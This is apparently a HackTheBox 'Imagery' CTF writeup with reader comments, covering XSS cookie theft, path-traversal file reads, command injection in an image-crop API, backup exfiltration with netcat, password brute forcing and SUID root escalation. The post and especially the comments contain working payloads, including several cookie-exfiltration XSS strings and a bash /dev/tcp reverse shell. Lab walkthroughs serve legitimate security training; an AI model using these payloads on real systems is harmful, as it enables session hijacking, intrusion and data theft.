xone 1 month ago

xone #hackthebox

Imagery HTB Writeup | HacktheBox | Season 9

Linux · Medium

High level attack flow

Recon — port 8000: web app (image gallery) and SSH open.
Register a regular account, use bug report / XSS to steal an admin session cookie → access admin panel.
Admin log endpoint has LFI (directory traversal) — retrieve db.json and other app files.
Analyse api_edit.py (image transform handler) — crop operation uses shell=True and concatenates parameters → command injection possible.
Use a privileged account (test user) to upload an image and trigger the crop transform with a command injection payload → reverse shell.
On the box: read /var/backup/web_20250806_120723.zip.aes (world-readable) and exfiltrate.
Crack / decrypt the AES-Crypt .aes backup offline with a wordlist (rockyou) using pyAesCrypt wrapper → recover archive → inspect db.json to find other credentials/hashes.
Use an obtained user credential to SSH/switch to the user account and read user.txt.
Privilege escalation: the user can run /usr/local/bin/charcol via sudo — use charcol -R or the interactive charcol shell to reset/pass into a no-password shell, then schedule a recurring task (or set SUID on /usr/bin/bash) to get root → read root.txt.

Access is restricted by HackTheBox rules#

The solution to the problem can be published in the public domain after her retirement.

Look for a non-public solution to the problem in the telegram channel .

1 Initial enumeration

nmap -sC -sV -p22,8000 <IP> reveals SSH and a Python/Werkzeug app on port 8000.
Browse http://imagery.htb:8000/ → login/register, upload images, and a "report bug" page.

2 Get an admin session

Register a low-priv account and log in. Use the “Report Bug” to submit an XSS payload that exfiltrates cookies (host a simple HTTP server to catch requests). Example payload pattern used in the lab (redacted token):

<img src=1 onerror="document.location='http://<YOUR-IP>/steal/'+ document.cookie">

Catch the admin cookie on your webserver, then inject it into your browser storage (DevTools) to impersonate admin and access /admin pages. Do not post any cookie value here.

3 Local File Inclusion (LFI) via admin log endpoint

The admin endpoint GET /admin/get_system_log?log_identifier=... is concatenated into a path without sanitization. Try directory traversal:

/admin/get_system_log?log_identifier=

Use this to fetch application files. The lab fetched api_edit.py and db.json to understand the backend and discover credentials.

4) Why RCE is possible

api_edit.py constructs ImageMagick/convert commands as strings and calls them with shell=True. Parameters such as x, y, width, height, degrees, value are concatenated without proper type checks or sanitization — direct shell injection is possible if one of those parameters contains shell metacharacters. Filenames from the DB can also contain .. allowing path traversal.

5) Triggering RCE through the image transform API

Log in as the privileged test user account (lab notes found a test account; password redacted here: [REDACTED-PASSWORD]). Upload an image, go to gallery → transform → choose crop and supply a crafted x (or other numeric) parameter containing a shell payload that opens a reverse shell to your listener. The exact payload used in the lab is omitted and replaced with a conceptual example:Log in as the privileged test user account (lab notes found a test account; password redacted here: [REDACTED-PASSWORD]). Upload an image, go to gallery → transform → choose crop and supply a crafted x (or other numeric) parameter containing a shell payload that opens a reverse shell to your listener. The exact payload used in the lab is omitted and replaced with a conceptual example:

{
  "imageId": "<your-image-id>",
  "transformType": "crop",
  "params": {
    "x": "; <command-injection-goes-here> ;",
    "y": 0,
    "width": 640,
    "height": 640
  }
}

Start a listener (e.g. nc -lvnp 4444 or pwncat) and apply the transform — you should get a shell back.

6 Post-exploit: foothold & sensitive files

After a foothold, upload linpeas.sh and run it to enumerate. Lab notes caught linpeas output showing /var/backup/web_20250806_120723.zip.aes is world-readable (root-owned). This is the encrypted backup to target.

Options to exfiltrate:

Start nc -lvnp 4444 > web_20250806_120723.zip.aes on your host, then on the target nc <YOUR-IP> 4444 < /var/backup/web_20250806_120723.zip.aes

Or copy the file into a web-accessible upload (if you control a web user) and download over HTTP.

7 Decrypt the .aes backup offline

The file is AES-Crypt (v2). Use pyAesCrypt to decrypt, but you need the password. The lab used a small wrapper script to brute-force a wordlist (rockyou) with multiprocessing because the original tool only supports a single password at once. I have redacted the discovered password used in the writeup. Replace with your own authorized test targets only.

Example of decrypt command once you know a candidate password (do not attempt without authorization):

   pyAesCrypt -d web_20250806_120723.zip.aes  # interactive or with -p <password>

The lab’s brute script bf_pyaescrypt_multi.py iterates a wordlist and attempts decryption until it finds the correct passphrase. After decryption you get web_20250806_120723.zip, unzip it and inspect contents (including db.json).

Note: I have replaced the actual cracked password shown in the lab with [REDACTED-PASSWORD] and any hash values with [REDACTED-HASH] in this public guide.

8 Using recovered credentials → user shell

From the extracted db.json the lab found another user's password (redacted here). Use that credential to su or ssh to the user account (e.g. su - mark or ssh [email protected]) and read /home/mark/user.txt.

9 Privilege escalation via charcol

sudo -l shows the user (mark) can run /usr/local/bin/charcol as root without a password. charcol is a small CLI backup tool with:

charcol shell — an interactive shell

charcol -R or --reset-password-to-default — resets the app password to a default (requires sudo in the deployed environment)

Two practical paths used in the lab:

Use sudo charcol -R (with the discovered user password when required) then enter the interactive shell with no password and use the tool's auto add or schedule functionality to create a cron-like recurring task that copies /root/root.txt to /tmp/root.txt and sets it world readable every minute. Exit and read /tmp/root.txt.

Alternatively, schedule a task that runs chmod +s /usr/bin/bash every minute; wait for it to set the SUID bit, then spawn a root shell with /usr/bin/bash -p and read /root/root.txt.

14.5K

Comments 52

coolBro @coolBro123 1 month ago any content?

Confuse_pe... @confuse 1 month ago Register a regular account, use bug report / XSS to steal an admin session cookie → access admin panel. i am trying to do this but every time i report the bug with xss in it. i don't get any return back cookie.

lexi143 @Lexi143 1 month ago @confuse start a listener on your machine on 8000 Then do a bug report using this: script fetch("http://YOUR-IP:8000?" + document.cookie) script You’ll need to add <> and <\> to as I couldn’t add it here I did both subject and body, you should then get a response from your target IP with the session cookie

dev @dev 1 month ago @Lexi143 can tell me how ?

Alex @Alex-cyber 1 month ago @Lexi143 I put the exact command with the <> on the title and body and I still got nothing on my listener, do you know why ?

lexi143 @Lexi143 1 month ago @Alex-cyber my mistake. You don’t need script. Just run the following in the bug report : img src=x onerror=“new Image().src=‘http://your-ip:8000/?=‘+encodeURIComponent(document.cookie)” wrap this command in<>. Again I did this in Bug name and bug details.. And just make sure your listener is set on 8000. I used python3 -m http.server 8000 for my listener

Alapatra t... @alapatra-toli-10 1 month ago @Lexi143 i have tried this and still got no response from the server i only got bug submited. admin review is in progress. but still got no cookie response.

Sentinal @sentinal36 1 month ago @alapatra-toli-10 try iframe with fetch and wait a minute

Alapatra t... @alapatra-toli-10 1 month ago @sentinal36 i have been waited for reply from about 20 minutes

Sentinal @sentinal36 1 month ago @alapatra-toli-10 iframe src=\"javascript:fetch('http://IP:Port/?cookie='+encodeURIComponent(document.cookie))\" try this

Sentinal @sentinal36 1 month ago @sentinal36 less than sign is being deleted. You need to put it at the beginning and the end

Alapatra t... @alapatra-toli-10 1 month ago @sentinal36 why my netcat or python http server not receiving this i am using pwnbox to test. previous xss not worked and this one also not working.

Sentinal @sentinal36 1 month ago @alapatra-toli-10 iframe src=\"javascript:var x=new XMLHttpRequest();x.open('GET','http://IP:PORT/?c='+document.cookie,true);x.send();\" maybe that work, if it doesn't there has to be a problem with machine or vpn whatever bc it worked for me

Alapatra t... @alapatra-toli-10 1 month ago @sentinal36, thank you for giving me hint. i have already completed the xss process. My firewall intrupting the three way handshake. i have allowed it in my firewall. thank you for helping me.

test @test 1 month ago @Lexi143 I tried bro but it escapes <> ? what should I do

Peter @petpan 1 month ago @test Kali# python3 -m http.server 1337 Website Bug Report -> Bug Name / Summary :

Peter @petpan 1 month ago @test

Peter @petpan 1 month ago @test This string should be inside < > img src=x onerror=fetch('http://YOUR IP ADDRESS:1337/?c='+btoa(document.cookie))

Mr Orbit @0x0r61t 1 month ago @Lexi143 I got cookie in reply but they gives me my cookie back to me

test @test 1 month ago @petpan I have a doubt how can we confirm that there exist a db.json file at that path?

test @test 1 month ago @0x0r61t try having something meaningful on the like "image upload issue"

Alapatra t... @alapatra-toli-10 1 month ago @test you can check backward directory like cd ../../hello_world

Alapatra t... @alapatra-toli-10 1 month ago how can i crack the aes should i go with bruteforce or password was stored in some directory or path. i need a hint.

test @test 4 weeks ago @alapatra-toli-10 nahh bro I have found the web user how did you guys confirm that there exists a db.json file at the path?

Alapatra t... @alapatra-toli-10 4 weeks ago @test you can check the python code there is a register path with saves the data in db.json with hashimg the password. That way i know there is file that saves the current credentials of qll the user.

Peter @petpan 4 weeks ago @test ┌──(Lucifer㉿TheDevil)-[~/HTB/Imagery/PP] └─$ wfuzz -c -z file,paths.txt -u 'http://imagery.htb:8000/admin/get_system_log?log_identifier=FUZZ' -H 'Cookie: session=.eJw9jbEOgzAMRP_Fc4UEZcpER74iMolLLSUGxc6AEP-Ooqod793T3QmRdU94zBEcYL8M4RlHeADrK2YWcFYqteg571R0EzSW1RupVaUC7o1Jv8aPeQxhq2L_rkHBTO2irU6ccaVydB9b4LoBKrMv2w.aNzR8A.7Zk7t9Y-cQcpWMVHoe99Kbr6yxk' --hc 404

Peter @petpan 4 weeks ago @test paths.txt ... snippet .... ../db.json ../../db.json ../../../db.json ../db.jason ../../db.jason db.json /data/db.json /config/db.json /backup/db.json

test @test 4 weeks ago @petpan ohh thanks man where did you get this wordlists

test @test 4 weeks ago @alapatra-toli-10 what was the name of the file bro

heisenberg @heisenberg 4 weeks ago @petpan bro how did u come up with this wordlist and how to retrieve all files in the directory ?

Peter @petpan 4 weeks ago @heisenberg trail and error, have a script that creates a list with all types of common files and adds ../ ../../ etc to every file.

aldawire @aldawire 3 weeks ago @petpan I have my doubts you sucessfully brute-forced db.json, I feel like it's too uncommon despite the name. But if you did that, congrats. After 2 hours of bruteforcing, I noticed it's a python server, checked for config.py and there was one. config.py tells you about the db.json @heisenberg

qwerty @qwerty 4 weeks ago i can trigger /etc/passwd file...but how to find other files like db.json,app.py...?what would be the path for other files....?

Peter @petpan 4 weeks ago @qwerty Use burp for that GET /admin/get_system_log?log_identifier=../db.json HTTP/1.1

Peter @petpan 4 weeks ago @qwerty or web browser: http://imagery.htb:8000/admin/get_system_log?log_identifier=../db.json

Sentinal @sentinal36 4 weeks ago @qwerty dude first check ../../../../proc/self/environ that gives you a path that web application running on after that you ll try to add known names like db.json , api.py, app.py (../../../../bla/bla/app.py)

test @test 4 weeks ago @sentinal36 its empty bruh

heisenberg @heisenberg 4 weeks ago @sentinal36 bro like, how to retrieve all files in the directory ?

Alapatra t... @alapatra-toli-10 4 weeks ago can anyone help me with the aes file how can i crack it. i am trying to bruteforce the password at least 5 hrs and still no success with rockyou.txt

Sentinal @sentinal36 4 weeks ago @alapatra-toli-10 pip3 install pyAesCrypt after that ask a ai service (deepseek, gemini whatever) to write a bruteforce script for you with rockyou.txt

Alapatra t... @alapatra-toli-10 4 weeks ago @sentinal36 i already did that still no response. I have already used 700000+ password and still going.

Alapatra t... @alapatra-toli-10 4 weeks ago @sentinal36 i have tried and wait 9 hours and at last it says password not found. can anyone help me.

raphaeltot... @raphaeltotoso 4 weeks ago How can i privilege escalate using charcol ? Do you have the command line ? I'm triyng to execute auto add --schedule "* * * * *" --command "cp /bin/bash /tmp/pwn && chmod +s /tmp/pwn" --name "romeu" and after this /tmp/pwn -p but this is not working

Alapatra t... @alapatra-toli-10 4 weeks ago @raphaeltotoso you don't have to use the charcol. by the way you can ssh the web and use this command /usr/bin/bash -p this will help you enter bash and you can have the root access. i have finally finish this machine thank you "" xone "" to providing this great hint and also thank you all the players that help me providing the hint.

noclue @noclue 4 weeks ago @raphaeltotoso I also tried this one and the copy doesn't work somehow, but the original /bin/bash file can be used to do privilege escalation, just add -p. concerning that I can't login via SSH like other guys here, this might be another bug i guess.

Alapatra t... @alapatra-toli-10 4 weeks ago @noclue there is a secret key. Which help you create authorized key in the web which will help us connect ssh in web. Yes you can use original bash command.

The3rr0r @The3rr0r 4 weeks ago what kind of command injection payload I need to use for the reverse shell.

Peter @petpan 4 weeks ago @The3rr0r I used Burpsuite -> Send to repeater: then I modified the x parameter: "x":"`bash -c 'sh -i >& /dev/tcp/MY IP ADDRESS/1244 0>&1'`",

ghost @ghost 4 weeks ago anyone can you please help me how to crack the password of aes file i am using the rockyou it's taking very long time but again not sure about the creds

Peter @petpan 4 weeks ago @ghost One liner: python3 - <<'PY' import pyAesCrypt,sys,os buf=64*1024 enc='web_20250806_120723.zip.aes' out='web_20250806_120723.zip' for ln in open('/usr/share/wordlists/rockyou.txt','rb'): pw=ln.rstrip(b'\n\r').decode('utf-8',errors='ignore') try: pyAesCrypt.decryptFile(enc,out,pw,buf) print("FOUND PASSWORD:",pw) sys.exit(0) except Exception: # decryption failed for this password; remove partial output if created if os.path.exists(out): os.remove(out) print("PASSWORD NOT FOUND IN rockyou.txt") PY